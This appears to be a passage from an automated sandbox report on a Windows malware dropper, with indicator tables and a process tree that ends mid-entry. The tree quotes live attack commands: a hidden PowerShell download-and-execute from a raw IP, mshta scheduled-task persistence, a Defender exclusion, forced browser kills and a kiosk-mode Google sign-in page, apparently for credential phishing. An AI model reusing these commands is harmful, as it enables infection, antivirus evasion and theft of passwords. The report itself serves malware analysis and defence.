Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	ae09e8f5c6.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	ae09e8f5c6.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2972	schtasks.exe
2464	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2412	899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
2664	rapes.exe
2900	ce4pMzk.exe
2900	ce4pMzk.exe
2900	ce4pMzk.exe
2900	ce4pMzk.exe
772	powershell.exe
772	powershell.exe
772	powershell.exe
1568	TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE
2420	powershell.exe
868	powershell.exe
1928	powershell.exe
992	powershell.exe
992	powershell.exe
992	powershell.exe
2880	483d2fa8a0d53818306efeb32d3.exe
1628	powershell.exe
2788	20b1824b6e.exe
2460	099b641ade.exe
1672	AhFKwnS.exe
1184	ae09e8f5c6.exe
3456	696151d304.exe
1184	ae09e8f5c6.exe
1184	ae09e8f5c6.exe
1184	ae09e8f5c6.exe
1184	ae09e8f5c6.exe
908	784126e897.exe
4848	1566acddfa.exe
4848	1566acddfa.exe
920	f8860f532a.exe
920	f8860f532a.exe
920	f8860f532a.exe
920	f8860f532a.exe
4048	AhFKwnS.exe
6812	v6Oqdnc.exe
6812	v6Oqdnc.exe
7148	OEHBOHk.exe
2892	SplashWin.exe
2776	SplashWin.exe
2776	SplashWin.exe
3368	ce4pMzk.exe
3368	ce4pMzk.exe
3368	ce4pMzk.exe
3368	ce4pMzk.exe
4888	powershell.exe
7148	OEHBOHk.exe
7148	OEHBOHk.exe
7148	OEHBOHk.exe
7148	OEHBOHk.exe
7148	OEHBOHk.exe
7148	OEHBOHk.exe
7148	OEHBOHk.exe
7148	OEHBOHk.exe
7148	OEHBOHk.exe
4648	ckonftponqgz.exe
4664	powershell.exe
4648	ckonftponqgz.exe
4648	ckonftponqgz.exe
4648	ckonftponqgz.exe
4648	ckonftponqgz.exe
4648	ckonftponqgz.exe
4648	ckonftponqgz.exe
4648	ckonftponqgz.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
2776	SplashWin.exe
340	cmd.exe

Suspicious use of AdjustPrivilegeToken 33 IoCs

description	pid	Process
Token: SeDebugPrivilege	2900	ce4pMzk.exe
Token: SeDebugPrivilege	772	powershell.exe
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	1928	powershell.exe
Token: SeDebugPrivilege	992	powershell.exe
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeDebugPrivilege	3040	f995140a63.exe
Token: SeDebugPrivilege	1672	AhFKwnS.exe
Token: SeDebugPrivilege	1672	AhFKwnS.exe
Token: SeDebugPrivilege	4888	taskkill.exe
Token: SeDebugPrivilege	5032	taskkill.exe
Token: SeDebugPrivilege	3512	taskkill.exe
Token: SeDebugPrivilege	2948	taskkill.exe
Token: SeDebugPrivilege	1056	taskkill.exe
Token: SeDebugPrivilege	868	firefox.exe
Token: SeDebugPrivilege	868	firefox.exe
Token: SeDebugPrivilege	920	f8860f532a.exe
Token: SeDebugPrivilege	4048	AhFKwnS.exe
Token: SeDebugPrivilege	4048	AhFKwnS.exe
Token: SeDebugPrivilege	3368	ce4pMzk.exe
Token: SeDebugPrivilege	4888	powershell.exe
Token: SeShutdownPrivilege	3220	powercfg.exe
Token: SeShutdownPrivilege	3660	powercfg.exe
Token: SeShutdownPrivilege	3916	powercfg.exe
Token: SeShutdownPrivilege	3872	powercfg.exe
Token: SeDebugPrivilege	4664	powershell.exe
Token: SeShutdownPrivilege	4992	powercfg.exe
Token: SeShutdownPrivilege	4976	powercfg.exe
Token: SeShutdownPrivilege	5088	powercfg.exe
Token: SeShutdownPrivilege	5048	powercfg.exe
Token: SeLockMemoryPrivilege	2268	explorer.exe
Token: SeDebugPrivilege	5336	powershell.exe

Suspicious use of FindShellTrayWindow 18 IoCs

pid	Process
2412	899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
1416	7c581e7a04.exe
1416	7c581e7a04.exe
1416	7c581e7a04.exe
4848	1566acddfa.exe
4848	1566acddfa.exe
4848	1566acddfa.exe
4848	1566acddfa.exe
4848	1566acddfa.exe
4848	1566acddfa.exe
868	firefox.exe
868	firefox.exe
868	firefox.exe
868	firefox.exe
4848	1566acddfa.exe
4848	1566acddfa.exe
4848	1566acddfa.exe
4848	1566acddfa.exe

Suspicious use of SendNotifyMessage 16 IoCs

pid	Process
1416	7c581e7a04.exe
1416	7c581e7a04.exe
1416	7c581e7a04.exe
4848	1566acddfa.exe
4848	1566acddfa.exe
4848	1566acddfa.exe
4848	1566acddfa.exe
4848	1566acddfa.exe
4848	1566acddfa.exe
868	firefox.exe
868	firefox.exe
868	firefox.exe
4848	1566acddfa.exe
4848	1566acddfa.exe
4848	1566acddfa.exe
4848	1566acddfa.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2412 wrote to memory of 2664	2412	899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe	31
PID 2412 wrote to memory of 2664	2412	899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe	31
PID 2412 wrote to memory of 2664	2412	899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe	31
PID 2412 wrote to memory of 2664	2412	899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe	31
PID 2664 wrote to memory of 2900	2664	rapes.exe	33
PID 2664 wrote to memory of 2900	2664	rapes.exe	33
PID 2664 wrote to memory of 2900	2664	rapes.exe	33
PID 2664 wrote to memory of 2900	2664	rapes.exe	33
PID 2664 wrote to memory of 1416	2664	rapes.exe	34
PID 2664 wrote to memory of 1416	2664	rapes.exe	34
PID 2664 wrote to memory of 1416	2664	rapes.exe	34
PID 2664 wrote to memory of 1416	2664	rapes.exe	34
PID 1416 wrote to memory of 2892	1416	7c581e7a04.exe	35
PID 1416 wrote to memory of 2892	1416	7c581e7a04.exe	35
PID 1416 wrote to memory of 2892	1416	7c581e7a04.exe	35
PID 1416 wrote to memory of 2892	1416	7c581e7a04.exe	35
PID 1416 wrote to memory of 2988	1416	7c581e7a04.exe	37
PID 1416 wrote to memory of 2988	1416	7c581e7a04.exe	37
PID 1416 wrote to memory of 2988	1416	7c581e7a04.exe	37
PID 1416 wrote to memory of 2988	1416	7c581e7a04.exe	37
PID 2892 wrote to memory of 2972	2892	cmd.exe	38
PID 2892 wrote to memory of 2972	2892	cmd.exe	38
PID 2892 wrote to memory of 2972	2892	cmd.exe	38
PID 2892 wrote to memory of 2972	2892	cmd.exe	38
PID 2988 wrote to memory of 772	2988	mshta.exe	39
PID 2988 wrote to memory of 772	2988	mshta.exe	39
PID 2988 wrote to memory of 772	2988	mshta.exe	39
PID 2988 wrote to memory of 772	2988	mshta.exe	39
PID 772 wrote to memory of 1568	772	powershell.exe	41
PID 772 wrote to memory of 1568	772	powershell.exe	41
PID 772 wrote to memory of 1568	772	powershell.exe	41
PID 772 wrote to memory of 1568	772	powershell.exe	41
PID 2664 wrote to memory of 1872	2664	rapes.exe	42
PID 2664 wrote to memory of 1872	2664	rapes.exe	42
PID 2664 wrote to memory of 1872	2664	rapes.exe	42
PID 2664 wrote to memory of 1872	2664	rapes.exe	42
PID 1872 wrote to memory of 2520	1872	cmd.exe	44
PID 1872 wrote to memory of 2520	1872	cmd.exe	44
PID 1872 wrote to memory of 2520	1872	cmd.exe	44
PID 1872 wrote to memory of 2520	1872	cmd.exe	44
PID 1872 wrote to memory of 2296	1872	cmd.exe	45
PID 1872 wrote to memory of 2296	1872	cmd.exe	45
PID 1872 wrote to memory of 2296	1872	cmd.exe	45
PID 1872 wrote to memory of 2296	1872	cmd.exe	45
PID 2296 wrote to memory of 2420	2296	cmd.exe	46
PID 2296 wrote to memory of 2420	2296	cmd.exe	46
PID 2296 wrote to memory of 2420	2296	cmd.exe	46
PID 2296 wrote to memory of 2420	2296	cmd.exe	46
PID 1872 wrote to memory of 1984	1872	cmd.exe	47
PID 1872 wrote to memory of 1984	1872	cmd.exe	47
PID 1872 wrote to memory of 1984	1872	cmd.exe	47
PID 1872 wrote to memory of 1984	1872	cmd.exe	47
PID 1984 wrote to memory of 868	1984	cmd.exe	48
PID 1984 wrote to memory of 868	1984	cmd.exe	48
PID 1984 wrote to memory of 868	1984	cmd.exe	48
PID 1984 wrote to memory of 868	1984	cmd.exe	48
PID 1872 wrote to memory of 1356	1872	cmd.exe	49
PID 1872 wrote to memory of 1356	1872	cmd.exe	49
PID 1872 wrote to memory of 1356	1872	cmd.exe	49
PID 1872 wrote to memory of 1356	1872	cmd.exe	49
PID 1356 wrote to memory of 1928	1356	cmd.exe	50
PID 1356 wrote to memory of 1928	1356	cmd.exe	50
PID 1356 wrote to memory of 1928	1356	cmd.exe	50
PID 1356 wrote to memory of 1928	1356	cmd.exe	50

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe
"C:\Users\Admin\AppData\Local\Temp\899a16f7c64cb6ffb6253338a6c7370d8d4c93af2be3c36506193136054594a1.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2412
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2664
- - C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
    "C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\CMnYnzVl\Anubis.exe""
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1628
- - C:\Users\Admin\AppData\Local\Temp\10105750101\7c581e7a04.exe
    "C:\Users\Admin\AppData\Local\Temp\10105750101\7c581e7a04.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:1416
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn vkkiemaJdog /tr "mshta C:\Users\Admin\AppData\Local\Temp\ta6OjYcFr.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2892
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn vkkiemaJdog /tr "mshta C:\Users\Admin\AppData\Local\Temp\ta6OjYcFr.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2972
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\ta6OjYcFr.hta
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of WriteProcessMemory
      PID:2988
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:772
      - C:\Users\Admin\AppData\Local\TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE
        
        "C:\Users\Admin\AppData\Local\TempIWOF65VQKRBXHEK95HTKNKEK3DNZ6OAU.EXE"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:1568
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\10105760121\am_no.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1872
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 2
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:2520
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2296
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2420
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1984
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:868
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1356
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1928
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn "vF9OEmas82S" /tr "mshta \"C:\Temp\OjPpbvgIz.hta\"" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:2464
  - - C:\Windows\SysWOW64\mshta.exe
      mshta "C:\Temp\OjPpbvgIz.hta"
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      PID:1188
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:992
      - C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2880
- - C:\Users\Admin\AppData\Local\Temp\10106150101\20b1824b6e.exe
    "C:\Users\Admin\AppData\Local\Temp\10106150101\20b1824b6e.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2788
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      Downloads MZ/PE file
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2508
- - C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe
    "C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3040
  - - C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe
      "C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe"
      4⤵
      Executes dropped EXE
      PID:636
  - - C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe
      "C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe"
      4⤵
      Executes dropped EXE
      PID:1912
  - - C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe
      "C:\Users\Admin\AppData\Local\Temp\10106160101\f995140a63.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:296
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 296 -s 1008
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:628
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 524
      4⤵
      Loads dropped DLL
      Program crash
      PID:2368
- - C:\Users\Admin\AppData\Local\Temp\10106170101\099b641ade.exe
    "C:\Users\Admin\AppData\Local\Temp\10106170101\099b641ade.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2460
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      Downloads MZ/PE file
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:772
- - C:\Users\Admin\AppData\Local\Temp\10106180101\AhFKwnS.exe
    "C:\Users\Admin\AppData\Local\Temp\10106180101\AhFKwnS.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1672
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1672 -s 640
      4⤵
      Loads dropped DLL
      Program crash
      PID:5076
- - C:\Users\Admin\AppData\Local\Temp\10106200101\ae09e8f5c6.exe
    "C:\Users\Admin\AppData\Local\Temp\10106200101\ae09e8f5c6.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    PID:1184
- - C:\Users\Admin\AppData\Local\Temp\10106210101\696151d304.exe
    "C:\Users\Admin\AppData\Local\Temp\10106210101\696151d304.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3456
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 1204
      4⤵
      Loads dropped DLL
      Program crash
      PID:3920
- - C:\Users\Admin\AppData\Local\Temp\10106220101\784126e897.exe
    "C:\Users\Admin\AppData\Local\Temp\10106220101\784126e897.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:908
- - C:\Users\Admin\AppData\Local\Temp\10106230101\1566acddfa.exe
    "C:\Users\Admin\AppData\Local\Temp\10106230101\1566acddfa.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4848
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4888
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5032
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3512
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2948
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1056
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:2392
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
